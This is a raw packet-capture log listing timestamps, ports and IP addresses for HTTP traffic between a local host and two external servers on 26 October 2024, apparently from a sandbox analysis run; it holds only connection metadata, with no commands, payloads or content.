Oct 26, 2024 07:27:19.134943962 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.145447969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.145454884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.145467043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.145473003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.145479918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.145569086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.145569086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.159905910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.159913063 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.159925938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.159933090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.159964085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.159981966 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.160026073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.160331011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.160336971 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.160348892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.160377979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.160393000 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.180633068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.180675983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.180680037 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.180692911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.180708885 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.180733919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.180763960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.180769920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.180777073 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.180809021 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.222136021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222168922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222177029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222183943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222223997 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.222255945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.222321033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222369909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.222403049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222409964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222420931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222455978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.222690105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222697020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222702980 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222734928 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.222748995 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.222907066 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222959042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222963095 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.222965956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222973108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.222990990 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.223076105 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.223217010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223293066 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.223421097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223426104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223432064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223438978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223443985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223450899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223457098 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223463058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.223464012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223472118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223498106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.223527908 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.223980904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223989010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.223999977 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.224030972 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.224060059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.227327108 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.227334023 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.227339983 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.227344990 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.227461100 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.227461100 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.227502108 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.227570057 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.227647066 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.227653980 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.227720976 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.278224945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.278280020 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.278290033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.278297901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.278335094 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.278443098 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.278450012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.278461933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.278467894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.278479099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.278485060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.278485060 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.278492928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.278512955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.278537035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.279396057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.279402018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.279442072 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.280293941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.280301094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.280333042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.298649073 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.298693895 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.298711061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.298717976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.298723936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.298733950 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.298760891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.340202093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340208054 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340221882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340226889 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340234041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340245008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340251923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340260029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340261936 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.340267897 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340277910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340284109 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.340301991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.340322971 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.340377092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340384960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340431929 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.340836048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340842962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340853930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.340888977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.341083050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.341089010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.341100931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.341106892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.341113091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.341125011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.341131926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.341133118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.341154099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.341161966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.341169119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.341170073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.341181040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.341208935 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.412249088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412256002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412261963 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412302017 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.412326097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412333012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412338018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412343979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412349939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412363052 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412368059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.412369013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412384987 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.412404060 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.412698030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412735939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412748098 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412775993 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.412867069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412872076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.412909031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.418576002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.418617964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.418622971 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.418642998 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.418663979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.418673038 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.418678999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.418692112 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.418713093 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.418745041 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.458138943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458201885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458209991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.458211899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458220005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458226919 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458234072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458250999 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.458296061 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.458311081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458317041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458328009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458334923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458352089 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.458408117 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.458525896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458564997 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.458590984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458596945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458607912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458614111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458626032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.458643913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.458662987 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.458986998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.459067106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.459094048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.459100008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.459111929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.459124088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.459130049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.459135056 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.459142923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.459150076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.459155083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.459163904 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.459181070 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.459196091 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.529362917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.529419899 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.529589891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.529594898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.529608011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.529613972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.529618979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.529633045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.529639006 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.529639006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.529654026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.529659986 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.529660940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.529666901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.529689074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.529706955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.530127048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.530165911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.530167103 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.530173063 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.530190945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.530198097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.530205965 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.530232906 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.530545950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.530554056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.530577898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.530586958 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.530610085 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.536269903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.536307096 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.536319017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.536345959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.536364079 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.536365986 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.536370993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.536402941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.575694084 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.575710058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.575783968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.575800896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.575845957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.575853109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.575860977 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.575866938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.575874090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.575881004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.575916052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.575916052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.575942993 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.576103926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.576165915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.576199055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.576205969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.576246977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.576399088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.576441050 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.576467991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.576474905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.576494932 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.576502085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.576508999 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.576535940 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.576874018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.576879978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.576885939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.576908112 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.576932907 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.576994896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.577037096 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.577081919 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.577089071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.577095032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.577121973 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.577126026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.577132940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.577150106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.577173948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.647382021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647485018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.647532940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647547960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647555113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647577047 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647584915 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647597075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647603989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647609949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647622108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647629976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647636890 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647650003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647677898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647682905 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.647684097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647682905 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.647682905 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.647684097 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.647691011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647699118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647699118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.647706985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.647711039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.649667025 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.653877974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.653919935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.653943062 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.653965950 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.654017925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.654031992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.654036999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.654042959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.654066086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.654088974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.693176031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.693209887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.693214893 CEST	80	49982	185.215.113.84	192.168.2.7
